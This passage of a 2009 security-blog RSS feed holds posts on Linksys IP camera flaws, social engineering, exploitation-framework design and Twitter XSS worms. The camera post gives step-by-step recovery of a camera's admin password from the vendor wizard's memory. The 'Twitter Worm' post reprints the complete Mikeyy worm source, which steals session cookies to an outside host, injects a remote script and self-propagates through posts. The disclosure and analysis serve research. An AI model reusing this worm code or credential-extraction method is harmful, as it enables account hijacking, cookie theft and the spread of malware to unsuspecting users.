while, and as a security researcher I find it quite an interesting topic as many <q>de facto</q> security principles that are usually (attempted to be) followed when designing other types of systems are <em>not</em> often applied to embedded devices. This, I believe is due to lack of limitations in hardware resources, and lack of awareness on consequences of getting a miscellaneous device compromised. i.e.: <q>who cares if my IP camera gets owned?</q></p> <p><em>During the next days, I&#8217;ll be posting some vulnerabilities I&#8217;ve found. Some of them are fun and serious, while others you might find kind of boring</em>.</p> <h3>Meet the target</h3> <p>You can learn a lot about the specs of a device by simply reading the product&#8217;s literature. However, sometimes not enough info is provided in these documents. The following are some of the specs I confirmed by interacting with the camera in various ways:</p> <ul>
<li>CPU: <code>Faraday FA526id(wb) rev 1 (v4l)</code> according to <code>/proc/cpuinfo</code></li>
<li>OS: <code>Linux version 2.4.19-pl1029</code> according to <code>/proc/version</code> plus Busybox (confirmed as the file <code>/bin/busybox</code> exists on the filesystem)</li>
<li>HTTPD: <code>thttpd 2.25b</code> (extracted from banner returned on default html error pages and &#8216;Server:&#8217; HTTP headers)</li>
<li>Memory:30908 kB (32 MB?) according to <code>/proc/meminfo</code></li>
<li>Firmware Version: V1.00R22 and <a rel="nofollow" target="_blank" href="http://downloads.linksysbycisco.com/downloads/WVC54GCA_FW_100R24,0.zip">V1.00R24</a> (latest version available as on 16th April 2009)</li>
</ul> <p>It also comes with a telnet daemon (<code>/usr/sbin/telnetd</code>) but unfortunately for hackers out there, the daemon is disabled as the following line is commented out on <code>/etc/init.d/rcS</code>:</p> <pre><code># ---- Start Telnet Server (debug) ---- #<br />
#/usr/sbin/telnetd &#038;</code></pre> <p>I have not yet managed to get a remote root shell by enabling the telnet daemon but have found some vulnerabilities which might help accomplishing this goal. I will be releasing these vulnerabilities in the next days. Please let me know if you know how to enable the telnet daemon on Linksys IP cameras! Ideally, I&#8217;d like to accomplish this without physically connecting to the camera or flashing the firmware.</p> <h3>Remote admin compromise by unauthenticated attackers due to wizard design error</h3> <p>I found this vulnerability while investigating <a rel="nofollow" target="_blank" href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4390">CVE-2008-4390</a>. I wanted to know if CVE-2008-4390 affected my camera, even though it was reported to affect a different Linksys IP camera firmware and model. The CVE entry states:</p> <blockquote>The Cisco Linksys WVC54GC wireless video camera before firmware 1.25 sends cleartext configuration data in response to a Setup Wizard remote-management command, which allows remote attackers to obtain sensitive information such as passwords by sniffing the network.</blockquote> <p>So I started trying to figure out if the WVC54GCA also discloses sensitive information when communicating with the <a rel="nofollow" target="_blank" href="http://downloads.linksysbycisco.com/downloads/WVC54GCA-CD-Content-10-25-2007_SetupWiz.zip">wizard</a>. <a rel="nofollow" target="_blank" href="http://www.kb.cert.org/vuls/id/MAPG-7HJKSA">According to the vendor</a>, the issue has been fixed:</p> <blockquote>Solution: 2300 and 210 have encrypted data and have no such issue. To decode the data, an administrator username/password is a MUST.</blockquote> <p>At first sight, when capturing the traffic between the wizard and the cam, I couldn&#8217;t see the data traveling in human readable form. While trying to figure out how the data is sent over the network (i.e.: encoded/encrypted), I realized there was something seriously wrong with the handshake mechanism.</p> <p>The following is a very generic (and possibly inaccurate) description of the handshake</p> <ol>
<li>Wizard (<code>SetupWizard.exe</code>) sends UDP request to 255.255.255.255:916</li>
<li>Camera responds back to 255.255.255.255 using the <a rel="nofollow" target="_blank" href="http://en.wikipedia.org/wiki/DCE/RPC">DCERPC</a> protocol and presents itself with identity info such as the value of the &#8216;defname&#8217; variable which looks like LKXXXXXX, where &#8216;X&#8217; is a hex digit. This identity info is picked up by <code>SetupWizard.exe</code>. Some of this info such as MAC address, IP address and subnet mask is shown in the wizard.</li>
<li>From now on, <code>SetupWizard.exe</code> uses the camera&#8217;s &#8216;defname&#8217; variable when talking to it, so that the camera knows what requests submitted to 255.255.255.255:916 it should respond to.</li>
</ol> <p>At this point the wizard &#8220;has discovered&#8221; the camera and the user can go through the setup procedure. For security reasons, the user needs to enter the admin username and password, before the setup process can start. Otherwise anyone could make changes to the camera without authenticating.</p> <p>Now, here is the important bit. If you capture the network traffic while running <code>SetupWizard.exe</code>, you&#8217;ll notice that <strong>when the user is asked to enter the admin username and password after the camera is discovered, there are NO requests sent from the wizard to the camera in order to verify that the entered username/password combination is correct! </strong></p> <p>&#8220;How is this possible? What the heck is going on?!&#8221; I thought. I was terrified to confirm my worst fear: the wizard already &#8220;knows&#8221; the camera&#8217;s admin username and password at this point, thus there is no need to ask the camera again. Indeed, at this point &#8211; <em>before the user enters the admin username and password</em> that is &#8211; the camera&#8217;s credentials are already loaded into the memory of the <code>SetupWizard.exe</code> process. This is because the camera has previously transfered the admin credentials along with other configuration data!</p> <p>In case I didn&#8217;t explain myself properly I&#8217;ll summarize the issue by saying that <strong>the camera transfers the admin username and password to the wizard before the user enters them</strong>.</p> <p>The following steps demonstrate how an unauthenticated attacker can remotely obtain the camera&#8217;s admin username and password:</p> <ol>
<li>Download the <a rel="nofollow" target="_blank" href="http://downloads.linksysbycisco.com/downloads/WVC54GCA-CD-Content-10-25-2007_SetupWiz.zip">setup wizard</a>. You might need to download a different wizard if you want to test this vulnerability on a different Linksys IP camera model</li>
<li>Run <code>SetupWizard.exe</code></li>
<li>Click on &#8220;Click Here to Start&#8221; / &#8220;Setup Camera&#8221; / &#8220;Next&#8221; (after accepting EULA) / &#8220;Next&#8221; (4 more times in total)</li>
<li>The discovery process is quite flaky, so if the wizard hasn&#8217;t found your camera yet, click on &#8220;Search Again&#8221; as many times as required until it works</li>
<li>You should now see your camera&#8217;s name under the &#8220;Camera List&#8221; column and also various configuration data under the &#8220;Status&#8221; column:
<div class="screen"><img src="http://www.gnucitizen.org/static/blog/2009/04/wizard_cam_discovery-300x225.png" alt="Wizard Cam Discovery" title="Wizard Cam Discovery" width="300" height="225" class="alignnone size-medium wp-image-2922"/></div></li>
<li>You now need to dump the process memory of <code>SetupWizard.exe</code> using your favorite <a rel="nofollow" target="_blank" href="http://www.ntsecurity.nu/toolbox/pmdump/">tool</a>:
<div class="screen"><img src="http://www.gnucitizen.org/static/blog/2009/04/setupwizardexe_mem_dump_21-300x166.png" alt="setupwizardexe Mem Dump 2" title="setupwizardexe Mem Dump 2" width="300" height="166" class="alignnone size-medium wp-image-2926"/></div></li>
<li>Then open the memory dump file using your favorite <a rel="nofollow" target="_blank" href="http://www.chmaas.handshake.de/delphi/freeware/xvi32/xvi32.htm">hex editor</a></li>
<li>Now you can either search for &#8220;admin&#8221; and find the admin password after a few null bytes, or tell your hex editor to go to decimal position 75058 (&#8221;Address&#8221; / &#8220;Goto &#8230;&#8221; menu on XVI32). In my case the admin password would always fall within this position:
<div class="screen"><img src="http://www.gnucitizen.org/static/blog/2009/04/admin_password_extraction1-300x217.png" alt="Admin Password Extraction 1" title="Admin Password Extraction 1" width="300" height="217" class="alignnone size-medium wp-image-2945"/>
<img src="http://www.gnucitizen.org/static/blog/2009/04/admin_password_extraction_2-300x216.png" alt="Admin Password Extraction 2" title="Admin Password Extraction 2" width="300" height="216" class="alignnone size-medium wp-image-2947"/></div></li>
<li>Have fun! (the most important step really)</li>
</ol> <p>It is somehow ironic that a free tool provided by the vendor of a product can be used as a &#8220;hacker&#8221; tool against their own product.</p> <p><em>As far as I know, this vulnerability cannot be exploited over the Internet, since the camera only responds to wizards located in the same LAN. Never say never though, so if you find a way to exploit this vulnerability over the Internet, please <a rel="nofollow" target="_blank" href="http://www.gnucitizen.org/contact/">contact</a> us.</em></p> <p>UPDATE: CPU and additional OS info added.</p><p>---<br/>gnucitizen <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net/gigs">information security gigs</a> part of the <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net">cutting-edge network</a>:</p><ul><li><a rel="nofollow" target="_blank" href="http://www.adsosimple.com/">No active items found!</a></li><li><a rel="nofollow" target="_blank" href="http://spreadsheets.google.com/viewform?formkey=cFFqa3VVa0FRWFdwN2hzMHVvaldaWWc6MA..">GNUCITIZEN Content Survey</a></li></ul><p>---<br/>recent posts from the gnucitizen <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net/">cutting-edge network</a>:</p><p><a rel="nofollow" target="_blank" href="http://blog.websecurify.com/2009/07/websecurify-security-scanner-v01-sneak.html">Websecurify Security Scanner v0.1 Sneak Peek</a><br/><a rel="nofollow" target="_blank" href="http://feedproxy.google.com/~r/gnucitizen/~3/MbrBV_cxDIg/">CVE-2009-1151: phpMyAdmin Remote Code Execution Proof of Concept</a><br/><a rel="nofollow" target="_blank" href="http://houseofhackers.org/2009/06/06/next-stage/">Next Stage</a><br/><a rel="nofollow" target="_blank" href="http://feedproxy.google.com/~r/gnucitizen/~3/i5HZCjdXt3I/">Hacking Linksys IP Cameras (pt 5)</a><br/><a rel="nofollow" target="_blank" href="http://www.hakiri.org/blog/simple-and-obvious/">Simple and Obvious</a><br/></p><img src="http://feeds.feedburner.com/~r/gnucitizen/~4/L70Pxgeh0oI" height="1" width="1"/>]]></content:encoded>
      </item>
      <item>
         <title>It is All About People Manipulation Skills</title>
         <link>http://feedproxy.google.com/~r/gnucitizen/~3/2sj1FfUKA44/</link>
         <description>On the 14th this month, Computerworld published an interesting article titled &amp;#8216;Mafiaboy&amp;#8217; spills the beans at IT360 on underground hackers. Interesting read but nothing too exciting. The article is yet another proof that we are all in big trouble. Simply put, the technology will continue to develop and the majority of people wont be able to keep up. As long as the situation remains the same, people and corporations will get exploited regardless how tight their security is. [...]</description>
         <guid isPermaLink="false">https://www.gnucitizen.org/?p=2955</guid>
         <pubDate>Sun, 19 Apr 2009 02:15:05 -0700</pubDate>
         <content:encoded><![CDATA[<p>On the 14th this month, Computerworld published an interesting <a rel="nofollow" target="_blank" href="http://www.computerworld.com/action/article.do?command=viewArticleBasic&#038;articleId=9131571&#038;source=rss_topic82">article</a> titled <q>&#8216;Mafiaboy&#8217; spills the beans at IT360 on underground hackers</q>. Interesting read but nothing too exciting.</p> <div class="screen"><a rel="nofollow" target="_blank" href="http://www.flickr.com/photos/sreejithk2000/2385193167/"><img src="http://farm3.static.flickr.com/2381/2385193167_b654c17189.jpg?v=1207253004" alt="The crowd"/></a></div> <p>The article is yet another proof that we are all in big trouble. Simply put, the technology will continue to develop and the majority of people wont be able to keep up. As long as the situation remains the same, people and corporations will get exploited regardless how tight their security is. It is inevitable. At the end of the day, it is all about people, not technology.</p> <p><em>Social engineering skills has been a major part of the hacker&#8217;s toolkit for ages and the situation is unlikely to change. The humans are still the weakest link and that is something that can only be fixed through education and by continuously rising awareness.</em></p><p>---<br/>gnucitizen <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net/gigs">information security gigs</a> part of the <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net">cutting-edge network</a>:</p><ul><li><a rel="nofollow" target="_blank" href="http://www.adsosimple.com/">No active items found!</a></li><li><a rel="nofollow" target="_blank" href="http://spreadsheets.google.com/viewform?formkey=cFFqa3VVa0FRWFdwN2hzMHVvaldaWWc6MA..">GNUCITIZEN Content Survey</a></li></ul><p>---<br/>recent posts from the gnucitizen <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net/">cutting-edge network</a>:</p><p><a rel="nofollow" target="_blank" href="http://blog.websecurify.com/2009/07/websecurify-security-scanner-v01-sneak.html">Websecurify Security Scanner v0.1 Sneak Peek</a><br/><a rel="nofollow" target="_blank" href="http://feedproxy.google.com/~r/gnucitizen/~3/MbrBV_cxDIg/">CVE-2009-1151: phpMyAdmin Remote Code Execution Proof of Concept</a><br/><a rel="nofollow" target="_blank" href="http://houseofhackers.org/2009/06/06/next-stage/">Next Stage</a><br/><a rel="nofollow" target="_blank" href="http://feedproxy.google.com/~r/gnucitizen/~3/i5HZCjdXt3I/">Hacking Linksys IP Cameras (pt 5)</a><br/><a rel="nofollow" target="_blank" href="http://www.hakiri.org/blog/simple-and-obvious/">Simple and Obvious</a><br/></p><img src="http://feeds.feedburner.com/~r/gnucitizen/~4/2sj1FfUKA44" height="1" width="1"/>]]></content:encoded>
      </item>
      <item>
         <title>Mikeyy Returns</title>
         <link>http://blog.blogsecurify.com/2009/04/mikeyy-returns.html</link>
         <description>&lt;a rel="nofollow" target="_blank" href="http://mashable.com/2009/04/17/mikeyy-worm-returns/"&gt;According&lt;/a&gt; to Mashable, the Mikeyy twitter worm has returned.&lt;br /&gt;&lt;br /&gt;&lt;a rel="nofollow" target="_blank" href="http://2.bp.blogspot.com/_9TXLRd-gO5c/Sejrbd8aIsI/AAAAAAAAAJw/gENiZye-i1w/s1600-h/twitter1.jpg"&gt;&lt;img style="cursor:pointer;width:320px;height:219px;" src="http://2.bp.blogspot.com/_9TXLRd-gO5c/Sejrbd8aIsI/AAAAAAAAAJw/gENiZye-i1w/s320/twitter1.jpg" alt="" id="BLOGGER_PHOTO_ID_5325765416492606146" border="0"/&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;I am personally not surprised. Given the ease of finding XSS vectors nowadays it is more surprising that we haven't seen massive XSS outbreaks everywhere.&lt;br /&gt;&lt;br /&gt;XSS attacks and worms will become more and more relevant as the web expands because they are defacto the equivalent of buffer overflows in the software security world.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style:italic;"&gt;I think that talked about these stuff 4-5 years ago.&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/443511708867239838-6875339143197705536?l=blog.blogsecurify.com'/&gt;&lt;/div&gt;</description>
         <author>noreply@blogger.com (pdp)</author>
         <guid isPermaLink="false">tag:blogger.com,1999:blog-443511708867239838.post-6875339143197705536</guid>
         <pubDate>Fri, 17 Apr 2009 13:44:00 -0700</pubDate>
         <media:thumbnail width="72" url="http://2.bp.blogspot.com/_9TXLRd-gO5c/Sejrbd8aIsI/AAAAAAAAAJw/gENiZye-i1w/s72-c/twitter1.jpg" height="72" />
      </item>
      <item>
         <title>Exploit Development Framework Design</title>
         <link>http://feedproxy.google.com/~r/gnucitizen/~3/_jDJKjbFqeo/</link>
         <description>Perl, Ruby Python: use the language that suits your character. However, one of the things that differentiate python from the rest is its philosophy, which is: there should be one&amp;#8211; and preferably only one &amp;#8211;obvious way to do it (where it is a problem). This philosophy gives python some interesting advantages over other similar languages. That will be explained later on. [...]</description>
         <guid isPermaLink="false">https://www.gnucitizen.org/?p=2881</guid>
         <pubDate>Thu, 16 Apr 2009 02:40:15 -0700</pubDate>
         <content:encoded><![CDATA[<p>Perl, Ruby Python: use the language that suits your character. However, one of the things that differentiate python from the rest is its philosophy, which is: <q>there should be one&#8211; and preferably only one &#8211;obvious way to do it</q> (where <q>it</q> is <q>a problem</q>). This philosophy gives python some interesting advantages over other similar languages. That will be explained later on.</p> <div class="screen"><a rel="nofollow" target="_blank" href="http://www.flickr.com/photos/schoffer/196079076/"><img src="http://farm1.static.flickr.com/76/196079076_ef3d5172dc.jpg?v=0" alt="graz - graffiti :: monty python"/></a></div> <p>This post is merely a summary of my research work on how to build a better exploitation framework ala <a rel="nofollow" target="_blank" href="http://www.metasploit.com">metasploit</a>-style.</p> <h3>The Problem</h3> <p>Metasploit is great but there are three things that makes the framework sometimes inconvenient: it&#8217;s size, it&#8217;s dependency of the ruby platform and of course it&#8217;s speed. It will be great if for example we can take a single exploit (or a set of exploits) out of the framework and compile it into a standalone executable. On the advantage side, this type of solution will also allow us to ship the framework as a payload to already compromised systems and use it from there as a stepping stone for further propagation. It will also allows us to run exploits from compromised embedded devices as long as we can compile for their architecture, which is pretty cool.</p> <div class="message">I understand that it is possible to bundle the entire framework plus the ruby environment into one executable but such a solution is simply not elegant enough and not fully cross-platformed.</div> <h3>Introduction</h3> <p>Back in the days when Metasploit was written in Perl, there were a few other frameworks trying to do similar things but in C and C++. A solution based on C or C++ is a lot more interesting as it allows us to compile standalone versions of the framework and use them as we wish. It simply makes the framework very good for embedding and also quite suitable for delivering it as a payload to the systems we would like to compromise.</p> <p>Nowadays, a C and C++ solution is often doomed to failure. The reason for this is because when building a framework you can easily get into a situation where you need to solve a pretty complicated problem. Both C and C++ lack the dynamicism and the degree of expression available in languages such as perl, python and ruby and therefore, while they remain very suitable for low level stuff, they start to loose their grounds when it is needed to build something that is more abstract and high level.</p> <h3>Some Solutions</h3> <p>Keeping all of the above in mind I started putting words into practice. In the spirit of a zen monk, I started thinking which parts of the metasploit framework are most valuable to a penetration tester so that they can be branched out. As it happens, the obvious answer is: <q>the exploits</q>. The <q>Auxiliary</q> modules are great but they represent functionalities which are already available in other tools. So, the first idea was to take the exploits and payloads out and rewrite them into something that is more suitable.</p> <p>I decided to see for myself if I can prototype a simple exploitation framework in C++ that all it should so is to implement several abstract interfaces for exploit development, a a class with common methods for payloads (empty of course) and of course a simple interface to run an exploit with a payload against a target. All of this was achieved in a <q>hello world</q> fashion exploiting a simple stack overflow on a proggie from the command line and of course without the need to circumvent any protection mechanisms in place.</p> <p>Although I was pleased with the result of the prototype, I was not convinced that this is a good enough solution. Programming in C++ is fun, especially when you haven&#8217;t done it for a couple of years, but still not as practicle as I would like it to be. We can most certainly build a DSL on the top of C and C++ by using Preprocessor Directives but when you are developing an exploit you want to make the process as painless as possible and C directives are only making it worse when hunting for a bug in the exploit. Not to mention that compiling something every time you make a change is not cool at all.</p> <p>Being a pythonist and knowing the python mantra inside out, I thought that it should be possible to write all of the exploits and payloads in python and convert them into C or C++ at later stage as long as I stick to using a minimal set of the language features which can be directly translated with regexes and some basic parsing. After all, python looks like an executable pseudo code. Luckily for me, such a solution already exists and it is called <a rel="nofollow" target="_blank" href="http://code.google.com/p/shedskin/">shedskin</a>.</p> <p>Now shedskin is a lot more than a simple python to C++ translator. Not only it can convert a python program to C++ source but it also implements all of python&#8217;s builtins and it has support for some of python&#8217;s most useful modules such as <code>re</code> and <code>socket</code>. On the top of that, it is trivial to implement additional modules to the shedskin framework in python. <em>This is a product I will happily pay for!</em></p> <h3>Analysis</h3> <p>I played quite a lot with the shedskin compiler tweaking things as I go. Although the parser is pretty advanced there are some restrictions enforced on the language. All of them are nicely covered in the shedskin&#8217;s tutorial.</p> <p>It was time to see if I do need the advanced python features for developing the exploits. I run through all Metasploit payloads and exploits and a pattern started to emerge. The majority of the exploits were pretty basic. They all came down to the following algorithm more or less:</p> <ol>
<li>Select an exploit</li>
<li>Pack a structure/payload that will be sent over a socket or will be dumped into a file</li>
<li>Send/Save the payload</li>
</ol> <p>Obviously, there is no need for python sugar to implement that.</p> <h3>The Design</h3> <p>I did quite a lot of work investigating the best approach to tackle the problem of creating a good enough exploitation framework and I came up with the following basic idea:</p> <p>We start with the same basic building blocks as found in metasploit. We need abstract classes for Exploits and Shellcodes and also classes that implement them to define more functional classes such as those that needs to be implemented when writing remote exploits for example (socket stuff). We use the basic python capabilities keeping shedskin in mind. As I mentioned, shedskin is quite advanced so most of the functionalities can be implemented without even taking it into consideration at all.</p> <p>That will provide the core of the framework. All of the exploits now can be written on the top of this. The exploits themselves should reuse as much as of the builtin methods as possible as that their portability will be guaranteed.</p> <p>A layer above that, we write as much as python sugar as we want. We simply don&#8217;t care how we are going to write it because that part of the framework doesn&#8217;t have to be compiled.</p> <p>In summary, we layer the whole thing like that:</p> <ul>
<li><strong>Layer 01.</strong> Core Exploit Development Classes implementing the most basic set of python features</li>
<li><strong>Layer 02.</strong> Exploits implementing the Core Exploit Development Classes</li>
<li><strong>Layer 03.</strong> Python sugar to glue it all together</li>
</ul> <h3>Conclusion</h3> <p>So, it is possible to write a good and well-designed exploitation framework in python that allows exploits to be separated and compiled in standalone native executables. Not only that, but we do not sacrifice from the dynamicism of the python language as while the core will be written in basic python, the rest will be as dynamic as we want. Imho, this is all possible due to python&#8217;s mantra that <q>there should be one&#8211; and preferably only one &#8211;obvious way to do it</q>. It just makes it easier to write briliant tools such as shedskin.</p> <div class="message">Although I am quite excited to start writing such a beast right a way, I am going to <code>pass</code> this time. I am starting to learn to say <q>NO</q> because I&#8217;ve got far too many things on my plate already. However, if anyone is interested in working on this, I will be very happy to facilitate the project as much as I can and give a hand where necessary.</div> <p><em>I am very interested to hear your opinion and I am even more interested to get the opinion of the Metasploit team as they have a lot more experience in coding exploitation frameworks than me.</em></p><p>---<br/>gnucitizen <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net/gigs">information security gigs</a> part of the <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net">cutting-edge network</a>:</p><ul><li><a rel="nofollow" target="_blank" href="http://www.adsosimple.com/">No active items found!</a></li><li><a rel="nofollow" target="_blank" href="http://spreadsheets.google.com/viewform?formkey=cFFqa3VVa0FRWFdwN2hzMHVvaldaWWc6MA..">GNUCITIZEN Content Survey</a></li></ul><p>---<br/>recent posts from the gnucitizen <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net/">cutting-edge network</a>:</p><p><a rel="nofollow" target="_blank" href="http://blog.websecurify.com/2009/07/websecurify-security-scanner-v01-sneak.html">Websecurify Security Scanner v0.1 Sneak Peek</a><br/><a rel="nofollow" target="_blank" href="http://feedproxy.google.com/~r/gnucitizen/~3/MbrBV_cxDIg/">CVE-2009-1151: phpMyAdmin Remote Code Execution Proof of Concept</a><br/><a rel="nofollow" target="_blank" href="http://houseofhackers.org/2009/06/06/next-stage/">Next Stage</a><br/><a rel="nofollow" target="_blank" href="http://feedproxy.google.com/~r/gnucitizen/~3/i5HZCjdXt3I/">Hacking Linksys IP Cameras (pt 5)</a><br/><a rel="nofollow" target="_blank" href="http://www.hakiri.org/blog/simple-and-obvious/">Simple and Obvious</a><br/></p><img src="http://feeds.feedburner.com/~r/gnucitizen/~4/_jDJKjbFqeo" height="1" width="1"/>]]></content:encoded>
      </item>
      <item>
         <title>Twitter Worm</title>
         <link>http://blog.blogsecurify.com/2009/04/twitter-worm.html</link>
         <description>As I've already &lt;a rel="nofollow" target="_blank" href="http://www.gnucitizen.org/blog/even-more-xss-worms/"&gt;mentioned&lt;/a&gt; on the &lt;a rel="nofollow" target="_blank" href="http://www.gnucitizen.org"&gt;GNUCITIZEN&lt;/a&gt; blog, Twitter has been hit by the same worm twice. The worm is similar in nature to the infamous Samy XSS Worm which hit MySpace in 2005 but a lot less severe. This is yet another example that XSS worms could and will be used as a propagation mechanism for more sever types of malware.&lt;br /&gt;&lt;br /&gt;For those who are curious, here is a the complete worm code:&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;&lt;pre&gt;&lt;code&gt;function XHConn()&lt;br /&gt;{&lt;br /&gt; var xmlhttp, bComplete = false;&lt;br /&gt; try { xmlhttp = new ActiveXObject("Msxml2.XMLHTTP"); }&lt;br /&gt; catch (e) { try { xmlhttp = new ActiveXObject("Microsoft.XMLHTTP"); }&lt;br /&gt; catch (e) { try { xmlhttp = new XMLHttpRequest(); }&lt;br /&gt; catch (e) { xmlhttp = false; }}}&lt;br /&gt; if (!xmlhttp) return null;&lt;br /&gt; this.connect = function(sURL, sMethod, sVars, fnDone)&lt;br /&gt; {&lt;br /&gt; if (!xmlhttp) return false;&lt;br /&gt; bComplete = false;&lt;br /&gt; sMethod = sMethod.toUpperCase();&lt;br /&gt; try {&lt;br /&gt; if (sMethod == "GET")&lt;br /&gt; {&lt;br /&gt; xmlhttp.open(sMethod, sURL+"?"+sVars, true);&lt;br /&gt; sVars = "";&lt;br /&gt; }&lt;br /&gt; else&lt;br /&gt; {&lt;br /&gt; xmlhttp.open(sMethod, sURL, true);&lt;br /&gt; xmlhttp.setRequestHeader("Method", "POST "+sURL+" HTTP/1.1");&lt;br /&gt; xmlhttp.setRequestHeader("Content-Type",&lt;br /&gt; "application/x-www-form-urlencoded");&lt;br /&gt; }&lt;br /&gt; xmlhttp.onreadystatechange = function(){&lt;br /&gt; if (xmlhttp.readyState == 4 &amp;&amp; !bComplete)&lt;br /&gt; {&lt;br /&gt; bComplete = true;&lt;br /&gt; fnDone(xmlhttp);&lt;br /&gt; }};&lt;br /&gt; xmlhttp.send(sVars);&lt;br /&gt; }&lt;br /&gt; catch(z) { return false; }&lt;br /&gt; return true;&lt;br /&gt; };&lt;br /&gt; return this;&lt;br /&gt;}&lt;br /&gt; &lt;br /&gt;function urlencode( str ) {&lt;br /&gt; var histogram = {}, tmp_arr = [];&lt;br /&gt; var ret = str.toString();&lt;br /&gt; &lt;br /&gt; var replacer = function(search, replace, str) {&lt;br /&gt; var tmp_arr = [];&lt;br /&gt; tmp_arr = str.split(search);&lt;br /&gt; return tmp_arr.join(replace);&lt;br /&gt; };&lt;br /&gt; &lt;br /&gt; histogram["'"] = '%27';&lt;br /&gt; histogram['('] = '%28';&lt;br /&gt; histogram[')'] = '%29';&lt;br /&gt; histogram['*'] = '%2A';&lt;br /&gt; histogram['~'] = '%7E';&lt;br /&gt; histogram['!'] = '%21';&lt;br /&gt; histogram['%20'] = '+';&lt;br /&gt; &lt;br /&gt; ret = encodeURIComponent(ret);&lt;br /&gt; &lt;br /&gt; for (search in histogram) {&lt;br /&gt; replace = histogram[search];&lt;br /&gt; ret = replacer(search, replace, ret)&lt;br /&gt; }&lt;br /&gt; &lt;br /&gt; return ret.replace(/(&amp;#92;%([a-z0-9]{2}))/g, function(full, m1, m2) {&lt;br /&gt; return "%"+m2.toUpperCase();&lt;br /&gt; });&lt;br /&gt; &lt;br /&gt; return ret;&lt;br /&gt;}&lt;br /&gt; &lt;br /&gt;var content = document.documentElement.innerHTML;&lt;br /&gt;userreg = new RegExp(/&amp;lt;meta content="(.*)" name="session-user-screen_name"/g);&lt;br /&gt;var username = userreg.exec(content);&lt;br /&gt;username = username[1];&lt;br /&gt; &lt;br /&gt;var cookie;&lt;br /&gt;cookie = urlencode(document.cookie);&lt;br /&gt;document.write("&amp;lt;img src='http://mikeyylolz.uuuq.com/x.php?c=" + cookie + "&amp;username=" + username + "'&amp;gt;");&lt;br /&gt;document.write("&amp;lt;img src='http://stalkdaily.com/log.gif'&amp;gt;");&lt;br /&gt; &lt;br /&gt;function wait()&lt;br /&gt;{&lt;br /&gt; var content = document.documentElement.innerHTML;&lt;br /&gt; &lt;br /&gt; authreg = new RegExp(/twttr.form_authenticity_token = '(.*)';/g);&lt;br /&gt; var authtoken = authreg.exec(content);&lt;br /&gt; authtoken = authtoken[1];&lt;br /&gt; //alert(authtoken);&lt;br /&gt; &lt;br /&gt; var randomUpdate=new Array();&lt;br /&gt; randomUpdate[0]="Dude, www.StalkDaily.com is awesome. What's the fuss?";&lt;br /&gt; randomUpdate[1]="Join www.StalkDaily.com everyone!";&lt;br /&gt; randomUpdate[2]="Woooo, www.StalkDaily.com :)";&lt;br /&gt; randomUpdate[3]="Virus!? What? www.StalkDaily.com is legit!";&lt;br /&gt; randomUpdate[4]="Wow...www.StalkDaily.com";&lt;br /&gt; randomUpdate[5]="@twitter www.StalkDaily.com";&lt;br /&gt; &lt;br /&gt; var genRand = randomUpdate[Math.floor(Math.random()*randomUpdate.length)];&lt;br /&gt; &lt;br /&gt; updateEncode = urlencode(genRand);&lt;br /&gt; &lt;br /&gt; var xss = urlencode('http://www.stalkdaily.com"&amp;gt;&amp;lt;/a&amp;gt;&amp;lt;script src="http://mikeyylolz.uuuq.com/x.js"&amp;gt;&amp;lt;/script&amp;gt;&amp;lt;a ');&lt;br /&gt; &lt;br /&gt; var ajaxConn = new XHConn();&lt;br /&gt; ajaxConn.connect("/status/update", "POST", "authenticity_token="+authtoken+"&amp;status="+updateEncode+"&amp;tab=home&amp;update=update");&lt;br /&gt; var ajaxConn1 = new XHConn();&lt;br /&gt; ajaxConn1.connect("/account/settings", "POST", "authenticity_token="+authtoken+"&amp;user[url]="+xss+"&amp;tab=home&amp;update=update");&lt;br /&gt;}&lt;br /&gt;setTimeout("wait()",3250);&lt;/code&gt;&lt;/pre&gt;&lt;/blockquote&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/443511708867239838-1725322013378363770?l=blog.blogsecurify.com'/&gt;&lt;/div&gt;</description>
         <author>noreply@blogger.com (pdp)</author>
         <guid isPermaLink="false">tag:blogger.com,1999:blog-443511708867239838.post-1725322013378363770</guid>
         <pubDate>Wed, 15 Apr 2009 01:41:00 -0700</pubDate>
      </item>
      <item>
         <title>Even More XSS Worms</title>
         <link>http://feedproxy.google.com/~r/gnucitizen/~3/xg_PlnFWsew/</link>
         <description>This morning I spotted several blog posts mentioning that Twitter has been hit by yet another XSS worm. There is no merit in discussing how this has been done and for what purposes but this incident is yet another proof that the attack landscape is rapidly changing and moving towards web enabled infrastructures and the client-side. [...]</description>
         <guid isPermaLink="false">https://www.gnucitizen.org/?p=2858</guid>
         <pubDate>Sun, 12 Apr 2009 01:29:41 -0700</pubDate>
         <content:encoded><![CDATA[<p>This morning I spotted <a rel="nofollow" target="_blank" href="http://www.techcrunch.com/2009/04/11/twitter-hit-by-stalkdaily-worm/">several blog posts</a> mentioning that Twitter has been hit by yet another XSS worm.</p> <div class="screen"><a rel="nofollow" target="_blank" href="http://www.flickr.com/photos/trinnity/2909816334/"><img src="http://farm4.static.flickr.com/3081/2909816334_8cd7c9972a.jpg?v=0" alt="Mark's Twitter Friends"/></a></div> <p>There is no merit in discussing how this has been done and for what purposes but this incident is yet another proof that the attack landscape is rapidly changing and moving towards web enabled infrastructures and the client-side. Soon or later almost every website will be equipped with social capabilities (google&#8217;s own opensocial and friendconnect platforms) and than simple persistent XSS attacks will turn into quite nasty problems.</p> <p><em>Time will tell!</em></p><p>---<br/>gnucitizen <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net/gigs">information security gigs</a> part of the <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net">cutting-edge network</a>:</p><ul><li><a rel="nofollow" target="_blank" href="http://www.adsosimple.com/">No active items found!</a></li><li><a rel="nofollow" target="_blank" 